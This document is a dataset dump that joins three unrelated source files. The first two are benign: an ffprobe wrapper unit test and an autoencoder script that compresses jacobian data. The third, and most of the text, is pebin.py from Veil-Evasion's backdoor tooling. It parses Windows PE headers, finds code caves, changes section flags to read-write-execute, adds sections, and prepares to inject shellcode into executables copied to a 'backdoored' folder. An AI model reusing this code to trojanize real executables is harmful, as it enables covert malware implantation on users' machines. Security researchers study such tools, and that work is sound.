melon-boy/odroid-webserver | pkg/ffmpeg_pywrapper/ffmpeg_pywrapper/tests/test.py | 1 | 2414 | #!/usr/bin/python
from unittest import TestCase, main
from ffmpeg_pywrapper.ffprobe import FFProbe
import pkg_resources
class TestFFProbe(TestCase):
'''
Unit test for FFProbe output
'''
VIDEO_FILE = pkg_resources.resource_filename('ffmpeg_pywrapper', 'res/test.mp4')
def test_print_formats(self):
ff = FFProbe(self.VIDEO_FILE)
filename = str(ff.get_format_filename())
self.assertTrue(filename)
duration = str(ff.get_format_duration())
self.assertTrue(duration)
format_name = str(ff.get_format_format_name())
self.assertTrue(format_name)
start_time = str(ff.get_format_start_time())
self.assertTrue(start_time)
size = str(ff.get_format_size())
self.assertTrue(size)
bit_rate = str(ff.get_format_bit_rate())
self.assertTrue(bit_rate)
print('-------------------------------------------------')
print('- Test 1: video file formats -')
print('-------------------------------------------------')
print('File name: ' + str(filename))
print('Duration (seconds): ' + str(duration))
print('Format: ' + str(format_name))
print('Start time (seconds): ' + str(start_time))
print('File Size (Kb): ' + str(size))
print('Bit rate (Kb/s): ' + str(bit_rate))
print('-------------------------------------------------')
print('- End of Test 1. -')
print('-------------------------------------------------')
print('-------------------------------------------------')
print('- Test 2: ffprobe command line execution -')
print('-------------------------------------------------')
def test_command_line_execution(self):
ff = FFProbe(self.VIDEO_FILE)
options = '-v error -show_entries format'
print('Arguments : ' + str(options))
res = ff.command_line_execution(options)
print('Output: ' + str(res))
print('-------------------------------------------------')
print('- End of Test 2. -')
print('-------------------------------------------------')
if __name__ == '__main__':
main()
| mit | -4,393,099,233,897,129,500 | 32.527778 | 84 | 0.423364 | false |
lmjohns3/cube-experiment | analysis/11-compress-jacobians.py | 1 | 2143 | import climate
import glob
import gzip
import io
import lmj.cubes
import logging
import numpy as np
import os
import pandas as pd
import pickle
import theanets
def compress(source, k, activation, **kwargs):
fns = sorted(glob.glob(os.path.join(source, '*', '*_jac.csv.gz')))
logging.info('%s: found %d jacobians', source, len(fns))
# the clipping operation affects about 2% of jacobian values.
dfs = [np.clip(pd.read_csv(fn, index_col='time').dropna(), -10, 10)
for fn in fns]
B, N = 128, dfs[0].shape[1]
logging.info('loaded %s rows of %d-D data from %d files',
sum(len(df) for df in dfs), N, len(dfs))
def batch():
batch = np.zeros((B, N), 'f')
for b in range(B):
a = np.random.randint(len(dfs))
batch[b] = dfs[a].iloc[np.random.randint(len(dfs[a])), :]
return [batch]
pca = theanets.Autoencoder([N, (k, activation), (N, 'tied')])
pca.train(batch, **kwargs)
key = '{}_k{}'.format(activation, k)
if 'hidden_l1' in kwargs:
key += '_s{hidden_l1:.4f}'.format(**kwargs)
for df, fn in zip(dfs, fns):
df = pd.DataFrame(pca.encode(df.values.astype('f')), index=df.index)
s = io.StringIO()
df.to_csv(s, index_label='time')
out = fn.replace('_jac', '_jac_' + key)
with gzip.open(out, 'wb') as handle:
handle.write(s.getvalue().encode('utf-8'))
logging.info('%s: saved %s', out, df.shape)
out = os.path.join(source, 'pca_{}.pkl'.format(key))
pickle.dump(pca, open(out, 'wb'))
@climate.annotate(
root='load data files from subject directories in this path',
k=('compress to this many dimensions', 'option', None, int),
activation=('use this activation function', 'option'),
)
def main(root, k=1000, activation='relu'):
for subject in lmj.cubes.Experiment(root).subjects:
compress(subject.root, k, activation,
momentum=0.9,
hidden_l1=0.01,
weight_l1=0.01,
monitors={'hid1:out': (0.01, 0.1, 1, 10)})
if __name__ == '__main__':
climate.call(main)
| mit | 1,167,373,156,157,772,800 | 30.057971 | 76 | 0.580495 | false |
codercold/Veil-Evasion | tools/backdoor/pebin.py | 1 | 54056 | '''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import sys
import os
import struct
import shutil
import platform
import stat
import time
import subprocess
import pefile
from random import choice
from intel.intelCore import intelCore
from intel.intelmodules import eat_code_caves
from intel.WinIntelPE32 import winI32_shellcode
from intel.WinIntelPE64 import winI64_shellcode
MachineTypes = {'0x0': 'AnyMachineType',
'0x1d3': 'Matsushita AM33',
'0x8664': 'x64',
'0x1c0': 'ARM LE',
'0x1c4': 'ARMv7',
'0xaa64': 'ARMv8 x64',
'0xebc': 'EFIByteCode',
'0x14c': 'Intel x86',
'0x200': 'Intel Itanium',
'0x9041': 'M32R',
'0x266': 'MIPS16',
'0x366': 'MIPS w/FPU',
'0x466': 'MIPS16 w/FPU',
'0x1f0': 'PowerPC LE',
'0x1f1': 'PowerPC w/FP',
'0x166': 'MIPS LE',
'0x1a2': 'Hitachi SH3',
'0x1a3': 'Hitachi SH3 DSP',
'0x1a6': 'Hitachi SH4',
'0x1a8': 'Hitachi SH5',
'0x1c2': 'ARM or Thumb -interworking',
'0x169': 'MIPS little-endian WCE v2'
}
#What is supported:
supported_types = ['Intel x86', 'x64']
class pebin():
"""
This is the pe binary class. PE files get fed in, stuff is checked, and patching happens.
"""
def __init__(self, FILE, OUTPUT, SHELL, NSECTION='sdata', DISK_OFFSET=0, ADD_SECTION=False,
CAVE_JUMPING=False, PORT=8888, HOST="127.0.0.1", SUPPLIED_SHELLCODE=None,
INJECTOR=False, CHANGE_ACCESS=True, VERBOSE=False, SUPPORT_CHECK=False,
SHELL_LEN=300, FIND_CAVES=False, SUFFIX=".old", DELETE_ORIGINAL=False, CAVE_MINER=False,
IMAGE_TYPE="ALL", ZERO_CERT=True, CHECK_ADMIN=False, PATCH_DLL=True):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.SHELL = SHELL
self.NSECTION = NSECTION
self.DISK_OFFSET = DISK_OFFSET
self.ADD_SECTION = ADD_SECTION
self.CAVE_JUMPING = CAVE_JUMPING
self.PORT = PORT
self.HOST = HOST
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.INJECTOR = INJECTOR
self.CHANGE_ACCESS = CHANGE_ACCESS
self.VERBOSE = VERBOSE
self.SUPPORT_CHECK = SUPPORT_CHECK
self.SHELL_LEN = SHELL_LEN
self.FIND_CAVES = FIND_CAVES
self.SUFFIX = SUFFIX
self.DELETE_ORIGINAL = DELETE_ORIGINAL
self.CAVE_MINER = CAVE_MINER
self.IMAGE_TYPE = IMAGE_TYPE
self.ZERO_CERT = ZERO_CERT
self.CHECK_ADMIN = CHECK_ADMIN
self.PATCH_DLL = PATCH_DLL
self.flItms = {}
def run_this(self):
if self.INJECTOR is True:
self.injector()
sys.exit()
if self.FIND_CAVES is True:
issupported = self.support_check()
if issupported is False:
print self.FILE, "is not supported."
return False
print ("Looking for caves with a size of %s bytes (measured as an integer" % self.SHELL_LEN)
self.find_all_caves()
return True
if self.SUPPORT_CHECK is True:
if not self.FILE:
print "You must provide a file to see if it is supported (-f)"
return False
try:
is_supported = self.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % self.FILE
if is_supported is False:
print "%s is not supported." % self.FILE
return False
else:
print "%s is supported." % self.FILE
return True
self.output_options()
return self.patch_pe()
def gather_file_info_win(self):
"""
Gathers necessary PE header information to backdoor
a file and returns a dict of file information called flItms
"""
#To do:
# verify signed vs unsigned
# map all headers
# map offset once the magic field is determined of 32+/32
self.binary.seek(int('3C', 16))
print "[*] Gathering file info"
self.flItms['filename'] = self.FILE
self.flItms['buffer'] = 0
self.flItms['JMPtoCodeAddress'] = 0
self.flItms['LocOfEntryinCode_Offset'] = self.DISK_OFFSET
#---!!!! This will need to change for x64 !!!!
#not so sure now..
self.flItms['dis_frm_pehdrs_sectble'] = 248
self.flItms['pe_header_location'] = struct.unpack('<i', self.binary.read(4))[0]
# Start of COFF
self.flItms['COFF_Start'] = self.flItms['pe_header_location'] + 4
self.binary.seek(self.flItms['COFF_Start'])
self.flItms['MachineType'] = struct.unpack('<H', self.binary.read(2))[0]
if self.VERBOSE is True:
for mactype, name in MachineTypes.iteritems():
if int(mactype, 16) == self.flItms['MachineType']:
print 'MachineType is:', name
#self.binary.seek(self.flItms['BoundImportLocation'])
#self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 2, 0)
self.flItms['NumberOfSections'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['TimeDateStamp'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 16, 0)
self.flItms['SizeOfOptionalHeader'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Characteristics'] = struct.unpack('<H', self.binary.read(2))[0]
#End of COFF
self.flItms['OptionalHeader_start'] = self.flItms['COFF_Start'] + 20
#if self.flItms['SizeOfOptionalHeader']:
#Begin Standard Fields section of Optional Header
self.binary.seek(self.flItms['OptionalHeader_start'])
self.flItms['Magic'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['MinorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['SizeOfCode'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfInitializedData'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfUninitializedData'] = struct.unpack("<I",
self.binary.read(4))[0]
self.flItms['AddressOfEntryPoint'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['BaseOfCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'Magic', self.flItms['Magic']
if self.flItms['Magic'] != int('20B', 16):
#print 'Not 0x20B!'
self.flItms['BaseOfData'] = struct.unpack('<I', self.binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if self.flItms['Magic'] == int('20B', 16):
#print 'x64!'
self.flItms['ImageBase'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['ImageBase'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'self.flItms[ImageBase]', hex(self.flItms['ImageBase'])
self.flItms['SectionAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['FileAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MajorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Win32VersionValue'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfImageLoc'] = self.binary.tell()
self.flItms['SizeOfImage'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeaders'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['CheckSum'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['Subsystem'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['DllCharacteristics'] = struct.unpack('<H', self.binary.read(2))[0]
if self.flItms['Magic'] == int('20B', 16):
self.flItms['SizeOfStackReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['SizeOfStackReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['LoaderFlags'] = struct.unpack('<I', self.binary.read(4))[0] # zero
self.flItms['NumberofRvaAndSizes'] = struct.unpack('<I', self.binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
self.flItms['ExportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ImportTableLOCInPEOptHdrs'] = self.binary.tell()
self.flItms['ImportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ResourceTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ExceptionTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CertTableLOC'] = self.binary.tell()
self.flItms['CertificateTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BaseReLocationTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Debug'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Architecutre'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['GlobalPrt'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['TLS Table'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['LoadConfigTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BoundImportLocation'] = self.binary.tell()
#print 'BoundImportLocation', hex(self.flItms['BoundImportLocation'])
self.flItms['BoundImport'] = struct.unpack('<Q', self.binary.read(8))[0]
self.binary.seek(self.flItms['BoundImportLocation'])
self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'first IATLOCIN CODE', hex(self.flItms['BoundImportLOCinCode'])
self.flItms['BoundImportSize'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'BoundImportSize', hex(self.flItms['BoundImportSize'])
self.flItms['IAT'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['DelayImportDesc'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CLRRuntimeHeader'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Reserved'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['BeginSections'] = self.binary.tell()
if self.flItms['NumberOfSections'] is not 0:
self.flItms['Sections'] = []
for section in range(self.flItms['NumberOfSections']):
sectionValues = []
sectionValues.append(self.binary.read(8))
# VirtualSize
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# VirtualAddress
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# SizeOfRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRelocations
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToLinenumbers
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# NumberOfRelocations
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# NumberOfLinenumbers
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# SectionFlags
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
self.flItms['Sections'].append(sectionValues)
if 'UPX'.lower() in sectionValues[0].lower():
print "UPX files not supported."
return False
if ('.text\x00\x00\x00' == sectionValues[0] or
'AUTO\x00\x00\x00\x00' == sectionValues[0] or
'CODE\x00\x00\x00\x00' == sectionValues[0]):
self.flItms['textSectionName'] = sectionValues[0]
self.flItms['textVirtualAddress'] = sectionValues[2]
self.flItms['textPointerToRawData'] = sectionValues[4]
elif '.rsrc\x00\x00\x00' == sectionValues[0]:
self.flItms['rsrcSectionName'] = sectionValues[0]
self.flItms['rsrcVirtualAddress'] = sectionValues[2]
self.flItms['rsrcSizeRawData'] = sectionValues[3]
self.flItms['rsrcPointerToRawData'] = sectionValues[4]
self.flItms['VirtualAddress'] = self.flItms['SizeOfImage']
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['textVirtualAddress'] +
self.flItms['textPointerToRawData'] +
self.flItms['LocOfEntryinCode_Offset'])
else:
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['LocOfEntryinCode_Offset'])
self.flItms['VrtStrtngPnt'] = (self.flItms['AddressOfEntryPoint'] +
self.flItms['ImageBase'])
self.binary.seek(self.flItms['BoundImportLOCinCode'])
self.flItms['ImportTableALL'] = self.binary.read(self.flItms['BoundImportSize'])
self.flItms['NewIATLoc'] = self.flItms['BoundImportLOCinCode'] + 40
####################################
#### Parse imports via pefile ######
self.binary.seek(0)
#make this option only if a IAT based shellcode is selected
if 'iat' in self.SHELL:
print "[*] Loading PE in pefile"
pe = pefile.PE(self.FILE, fast_load=True)
#pe = pefile.PE(data=self.binary)
print "[*] Parsing data directories"
pe.parse_data_directories()
try:
for entry in pe.DIRECTORY_ENTRY_IMPORT:
#print entry.dll
for imp in entry.imports:
#print imp.name
#print "\t", imp.name
if imp.name is None:
continue
if imp.name.lower() == 'loadlibrarya':
self.flItms['LoadLibraryAOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['LoadLibraryA'] = imp.address
if imp.name.lower() == 'getprocaddress':
self.flItms['GetProcAddressOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['GetProcAddress'] = imp.address
''' #save for later use
if imp.name.lower() == 'createprocessa':
print imp.name, hex(imp.address)
if imp.name.lower() == 'waitforsingleobject':
print imp.name, hex(imp.address)
if imp.name.lower() == 'virtualalloc':
print imp.name, hex(imp.address)
if imp.name.lower() == 'connect':
print imp.name, hex(imp.address)
if imp.name.lower() == 'createthread':
print imp.name, hex(imp.address)
'''
except Exception as e:
print "Exception:", str(e)
#####################################
def print_flItms(self, flItms):
keys = self.flItms.keys()
keys.sort()
for item in keys:
if type(self.flItms[item]) == int:
print item + ':', hex(self.flItms[item])
elif item == 'Sections':
print "-" * 50
for section in self.flItms['Sections']:
print "Section Name", section[0]
print "Virutal Size", hex(section[1])
print "Virtual Address", hex(section[2])
print "SizeOfRawData", hex(section[3])
print "PointerToRawData", hex(section[4])
print "PointerToRelocations", hex(section[5])
print "PointerToLinenumbers", hex(section[6])
print "NumberOfRelocations", hex(section[7])
print "NumberOfLinenumbers", hex(section[8])
print "SectionFlags", hex(section[9])
print "-" * 50
else:
print item + ':', self.flItms[item]
print "*" * 50, "END flItms"
def change_section_flags(self, section):
"""
Changes the user selected section to RWE for successful execution
"""
print "[*] Changing Section Flags"
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['BeginSections'], 0)
for _ in range(self.flItms['NumberOfSections']):
sec_name = self.binary.read(8)
if section in sec_name:
self.binary.seek(28, 1)
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
return
else:
self.binary.seek(32, 1)
def create_code_cave(self):
"""
This function creates a code cave for shellcode to hide,
takes in the dict from gather_file_info_win function and
writes to the file and returns flItms
"""
print "[*] Creating Code Cave"
self.flItms['NewSectionSize'] = len(self.flItms['shellcode']) + 250 # bytes
self.flItms['SectionName'] = self.NSECTION # less than 7 chars
self.flItms['filesize'] = os.stat(self.flItms['filename']).st_size
self.flItms['newSectionPointerToRawData'] = self.flItms['filesize']
self.flItms['VirtualSize'] = int(str(self.flItms['NewSectionSize']), 16)
self.flItms['SizeOfRawData'] = self.flItms['VirtualSize']
self.flItms['NewSectionName'] = "." + self.flItms['SectionName']
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['pe_header_location'] + 6, 0)
self.binary.write(struct.pack('<h', self.flItms['NumberOfSections'] + 1))
self.binary.seek(self.flItms['SizeOfImageLoc'], 0)
self.flItms['NewSizeOfImage'] = (self.flItms['VirtualSize'] +
self.flItms['SizeOfImage'])
self.binary.write(struct.pack('<I', self.flItms['NewSizeOfImage']))
self.binary.seek(self.flItms['BoundImportLocation'])
if self.flItms['BoundImportLOCinCode'] != 0:
self.binary.write(struct.pack('=i', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.seek(self.flItms['BeginSections'] +
40 * self.flItms['NumberOfSections'], 0)
self.binary.write(self.flItms['NewSectionName'] +
"\x00" * (8 - len(self.flItms['NewSectionName'])))
self.binary.write(struct.pack('<I', self.flItms['VirtualSize']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfImage']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfRawData']))
self.binary.write(struct.pack('<I', self.flItms['newSectionPointerToRawData']))
if self.VERBOSE is True:
print 'New Section PointerToRawData'
print self.flItms['newSectionPointerToRawData']
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
self.binary.write(self.flItms['ImportTableALL'])
self.binary.seek(self.flItms['filesize'] + 1, 0) # moving to end of file
nop = choice(intelCore.nops)
if nop > 144:
self.binary.write(struct.pack('!H', nop) * (self.flItms['VirtualSize'] / 2))
else:
self.binary.write(struct.pack('!B', nop) * (self.flItms['VirtualSize']))
self.flItms['CodeCaveVirtualAddress'] = (self.flItms['SizeOfImage'] +
self.flItms['ImageBase'])
self.flItms['buffer'] = int('200', 16) # bytes
self.flItms['JMPtoCodeAddress'] = (self.flItms['CodeCaveVirtualAddress'] -
self.flItms['AddressOfEntryPoint'] -
self.flItms['ImageBase'] - 5 +
self.flItms['buffer'])
def find_all_caves(self):
"""
This function finds all the codecaves in a inputed file.
Prints results to screen
"""
print "[*] Looking for caves"
SIZE_CAVE_TO_FIND = self.SHELL_LEN
BeginCave = 0
Tracking = 0
count = 1
caveTracker = []
caveSpecs = []
self.binary = open(self.FILE, 'r+b')
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except Exception as e:
#print str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
for caves in caveTracker:
for section in self.flItms['Sections']:
sectionFound = False
if caves[0] >= section[4] and caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
print "We have a winner:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
sectionFound = True
break
if sectionFound is False:
try:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
except Exception as e:
print str(e)
print "[*] Total of %s caves found" % len(caveTracker)
self.binary.close()
def find_cave(self):
"""This function finds all code caves, allowing the user
to pick the cave for injecting shellcode."""
len_allshells = ()
if self.flItms['cave_jumping'] is True:
for item in self.flItms['allshells']:
len_allshells += (len(item), )
len_allshells += (len(self.flItms['resumeExe']), )
SIZE_CAVE_TO_FIND = sorted(len_allshells)[0]
else:
SIZE_CAVE_TO_FIND = self.flItms['shellcode_length']
len_allshells = (self.flItms['shellcode_length'], )
print "[*] Looking for caves that will fit the minimum "\
"shellcode length of %s" % SIZE_CAVE_TO_FIND
print "[*] All caves lengths: ", len_allshells
Tracking = 0
count = 1
#BeginCave=0
caveTracker = []
caveSpecs = []
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except: # Exception as e:
#print "CODE CAVE", str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
pickACave = {}
for i, caves in enumerate(caveTracker):
i += 1
for section in self.flItms['Sections']:
sectionFound = False
try:
if caves[0] >= section[4] and \
caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
if self.VERBOSE is True:
print "Inserting code in this section:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
sectionFound = True
pickACave[i] = [section[0], hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], hex(section[4]),
hex(section[3] + section[4]), JMPtoCodeAddress]
break
except:
print "-End of File Found.."
break
if sectionFound is False:
if self.VERBOSE is True:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
try:
pickACave[i] = [None, hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], None,
None, JMPtoCodeAddress]
except:
print "EOF"
print ("############################################################\n"
"The following caves can be used to inject code and possibly\n"
"continue execution.\n"
"**Don't like what you see? Use jump, single, append, or ignore.**\n"
"############################################################")
CavesPicked = {}
for k, item in enumerate(len_allshells):
print "[*] Cave {0} length as int: {1}".format(k + 1, item)
print "[*] Available caves: "
for ref, details in pickACave.iteritems():
if details[3] >= item:
print str(ref) + ".", ("Section Name: {0}; Section Begin: {4} "
"End: {5}; Cave begin: {1} End: {2}; "
"Cave Size: {3}".format(details[0], details[1], details[2],
details[3], details[4], details[5],
details[6]))
while True:
try:
self.CAVE_MINER_TRACKER
except:
self.CAVE_MINER_TRACKER = 0
print "*" * 50
selection = raw_input("[!] Enter your selection: ")
try:
selection = int(selection)
print "[!] Using selection: %s" % selection
try:
if self.CHANGE_ACCESS is True:
if pickACave[selection][0] is not None:
self.change_section_flags(pickACave[selection][0])
CavesPicked[k] = pickACave[selection]
break
except:
print "[!!!!] User selection beyond the bounds of available caves."
print "[!!!!] Try a number or the following commands:"
print "[!!!!] append or a, jump or j, ignore or i, single or s"
print "[!!!!] TRY AGAIN."
continue
except:
pass
breakOutValues = ['append', 'jump', 'single', 'ignore', 'a', 'j', 's', 'i']
if selection.lower() in breakOutValues:
return selection
return CavesPicked
def runas_admin(self):
"""
This module jumps to .rsrc section and checks for
the following string: requestedExecutionLevel level="highestAvailable"
"""
#g = open(flItms['filename'], "rb")
runas_admin = False
print "[*] Checking Runas_admin"
if 'rsrcPointerToRawData' in self.flItms:
self.binary.seek(self.flItms['rsrcPointerToRawData'], 0)
search_lngth = len('requestedExecutionLevel level="highestAvailable"')
data_read = 0
while data_read < self.flItms['rsrcSizeRawData']:
self.binary.seek(self.flItms['rsrcPointerToRawData'] + data_read, 0)
temp_data = self.binary.read(search_lngth)
if temp_data == 'requestedExecutionLevel level="highestAvailable"':
runas_admin = True
break
data_read += 1
if runas_admin is True:
print "[*] %s must run with highest available privileges" % self.FILE
else:
print "[*] %s does not require highest available privileges" % self.FILE
return runas_admin
def support_check(self):
"""
This function is for checking if the current exe/dll is
supported by this program. Returns false if not supported,
returns flItms if it is.
"""
print "[*] Checking if binary is supported"
self.flItms['supported'] = False
#convert to with open FIX
self.binary = open(self.FILE, "r+b")
if self.binary.read(2) != "\x4d\x5a":
print "%s not a PE File" % self.FILE
return False
self.gather_file_info_win()
if self.flItms is False:
return False
if MachineTypes[hex(self.flItms['MachineType'])] not in supported_types:
for item in self.flItms:
print item + ':', self.flItms[item]
print ("This program does not support this format: %s"
% MachineTypes[hex(self.flItms['MachineType'])])
else:
self.flItms['supported'] = True
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
if self.flItms['Characteristics'] - 0x2000 > 0 and self.PATCH_DLL is False:
return False
if self.flItms['Magic'] == int('20B', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64':
targetFile.pe64_entry_instr()
elif self.flItms['Magic'] == int('10b', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x86'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x32':
targetFile.pe32_entry_instr()
else:
self.flItms['supported'] = False
if self.CHECK_ADMIN is True:
self.flItms['runas_admin'] = self.runas_admin()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
if self.flItms['supported'] is False:
return False
self.binary.close()
def patch_pe(self):
"""
This function operates the sequence of all involved
functions to perform the binary patching.
"""
print "[*] In the backdoor module"
if self.INJECTOR is False:
os_name = os.name
if not os.path.exists("backdoored"):
os.makedirs("backdoored")
if os_name == 'nt':
self.OUTPUT = "backdoored\\" + self.OUTPUT
else:
self.OUTPUT = "backdoored/" + self.OUTPUT
issupported = self.support_check()
if issupported is False:
return None
self.flItms['NewCodeCave'] = self.ADD_SECTION
self.flItms['cave_jumping'] = self.CAVE_JUMPING
self.flItms['CavesPicked'] = {}
self.flItms['LastCaveAddress'] = 0
self.flItms['stager'] = False
self.flItms['supplied_shellcode'] = self.SUPPLIED_SHELLCODE
theResult = self.set_shells()
if theResult is False or self.flItms['allshells'] is False:
return False
#Creating file to backdoor
self.flItms['backdoorfile'] = self.OUTPUT
shutil.copy2(self.FILE, self.flItms['backdoorfile'])
